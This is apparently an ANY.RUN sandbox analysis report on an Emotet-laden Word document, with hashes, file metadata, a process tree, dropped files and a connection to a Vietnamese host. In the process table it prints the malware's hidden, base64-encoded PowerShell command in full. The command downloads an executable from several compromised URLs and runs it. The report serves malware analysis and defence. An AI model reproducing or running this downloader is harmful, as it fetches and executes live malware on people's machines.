analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

8F7C75B7.doc

Full analysis: https://app.any.run/tasks/ce11ee29-fd62-4fbc-9d9a-c5fd8c6fa86f
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2019, 15:48:38
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
maldoc-4
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Consequatur fugiat quo., Author: Mara Herzenberg, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 6 12:41:00 2019, Last Saved Time/Date: Fri Dec 6 12:41:00 2019, Number of Pages: 1, Number of Words: 58, Number of Characters: 333, Security: 0
MD5:

16BD728544649F589D25A4FD9FFDF5AD

SHA1:

C9EA8CFF24FD2BA128788E7765718C237DE3FCF2

SHA256:

F448508EAFF1FA57B9F6B941009CBEE695F3DAD82F1849106DEB8A082EE0EC45

SSDEEP:

1536:7yqHHQc9temWSgIdVzW4b7EWPh30e4a/yCKgPufzfzDMeOY5C6OJsdBpZWjX3r9r:t4a/yCKgPufzfz4eOY5CTsdAbr9H/fb/

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 3196)
    • Creates files in the user directory

      • powershell.exe (PID: 3196)
    • Executed via WMI

      • powershell.exe (PID: 3196)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 1904)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1904)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Consequatur fugiat quo.
Subject: -
Author: Mara Herzenberg
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:12:06 12:41:00
ModifyDate: 2019:12:06 12:41:00
Pages: 1
Words: 58
Characters: 333
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 2
Paragraphs: 1
CharCountWithSpaces: 390
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
1904"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\8F7C75B7.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3196powershell -w hidden -en JABSAGkAdQBhAHIAYQBrAG0AbQB3AD0AJwBKAHoAYQBvAHYAYwBzAHgAdQB0AGUAJwA7ACQARgBlAGQAaQB2AGoAbQB3ACAAPQAgACcAMgA1ADkAJwA7ACQAQwBlAG0AegBwAHAAYwB3AD0AJwBCAHAAZwBnAHEAdQBlAGQAJwA7ACQAUABqAHYAcQB5AGcAYQBoAHEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEYAZQBkAGkAdgBqAG0AdwArACcALgBlAHgAZQAnADsAJABWAGQAaQBoAG4AawBlAGUAcwB4AGUAPQAnAFAAeQBmAGEAbQBoAHUAbgBuAGEAegBuAGYAJwA7ACQAUwBmAHYAbgB2AGIAbgBiAG4AYgBpAHkAPQAmACgAJwBuAGUAJwArACcAdwAtAG8AYgAnACsAJwBqAGUAYwB0ACcAKQAgAG4AZQB0AC4AVwBFAEIAQwBMAGkAZQBuAFQAOwAkAFYAdgB6AHgAdABzAG8AagBqAG0AYgB5AHkAPQAnAGgAdAB0AHAAcwA6AC8ALwBxAHUAeQBuAGgAaABhAG4AaABwAGgAdQBjAC4AYwBvAG0ALwBzAGUAdAB1AHAAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAxADEAMQAvAFAAUABGAEEAZgBlAGgAUQAvACoAaAB0AHQAcABzADoALwAvAHAAYQBpAG4AbQBhAG4AYQBnAGUAbQBlAG4AdABkAG8AYwB0AG8AcgBzAGQAZQBuAHYAZQByAC4AYwBvAG0ALwB3AHAALQBzAHUAYwB1AHIAaQAxAC8AUQBBAEUAdwBQAHkAdQBPAC8AKgBoAHQAdABwADoALwAvAGQAZQB2AC4AYQBkAHIAaQBhAG4AYQBwAGEAdABzAGEAbABvAHUALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEkAeQBsAE0AcQBXAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AZAB1AHIAdQBwAG8AbAAuAG8AcgBnAC8AdwBlAGIAXwBtAGEAcAAvADIAbQA4AC0AcQA0AG4AawBnAHgANgBiADgALQA3ADUALwAqAGgAdAB0AHAAOgAvAC8AYQByAGsAaQB2AC4AbABpAGwAbABlAGgAYQBtAG0AZQByAGEAcgB0AG0AdQBzAGUAdQBtAC4AYwBvAG0ALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBjADgAMAAtAGwAcAAyAC0AMQA3ADEANwA5ADgAMAA3ADUALwAnAC4AIgBzAFAAbABgAGkAdAAiACgAJwAqACcAKQA7ACQASAB6AG8AYQBxAG0AaAB5AHcAZgA9ACcATAB4AGUAYQB3AG4AcgBxAGgAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEUAaABpAGcAZgBuAGkAagBjAG0AIABpAG4AIAAkAFYAdgB6AHgAdABzAG8AagBqAG0AYgB5AHkAKQB7AHQAcgB5AHsAJABTAGYAdgBuAHYAYgBuAGIAbgBiAGkAeQAuACIARABPAFcAYABOAGAAbABgAG8AYQBkAGYAaQBMAGUAIgAoACQARQBoAGkAZwBmAG4AaQBqAGMAbQAsACAAJABQAGoAdgBxAHkAZwBhAGgAcQApADsAJABTAHcAdgBkAGgAYwBpAHUAaABvAHMAeAA9ACcARQB4AGwAaQB6AGoAdQBhAGIAagAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFAAagB2AHEAeQBnAGEAaABxACkALgAiAEwAYABFAG4AYABnAFQAaAAiACAALQBnAGUAIAAzADEAOAA2ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwB0AGAAQQByAFQAIgAoACQAUABqAHYAcQB5AGcAYQBoAHEAKQA7ACQARAB6AG4AZgBlAHYAZgB3AD0AJwBJAHoAdgBuAGwAZAByAHMAYQBsAHIAcwAnADsAYgByAGUAYQBrADsAJABJAGkAYwB6AHIAdgBsAG4AeQA9ACcAVQB0AGoAbwBiAG0AbQBhAGMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARQB2AGoAdwBqAHIAcAB4AGkAawA9ACcAVwB3AHQAZwBmAGgAagB1AGEAJwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 906
Read events
1 103
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
1904WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRBAA0.tmp.cvr
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97FB0DC7.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17ABFD1C.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7251026D.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\51B98D8A.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E74B2C03.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEA56E28.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9A328809.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FA57E76.wmf
MD5:
SHA256:
1904WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85506FFF.wmf
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3196
powershell.exe
103.28.36.212:443
quynhhanhphuc.com
NhanHoa Software company
VN
suspicious

DNS requests

Domain
IP
Reputation
quynhhanhphuc.com
  • 103.28.36.212
unknown

Threats

No threats detected
No debug info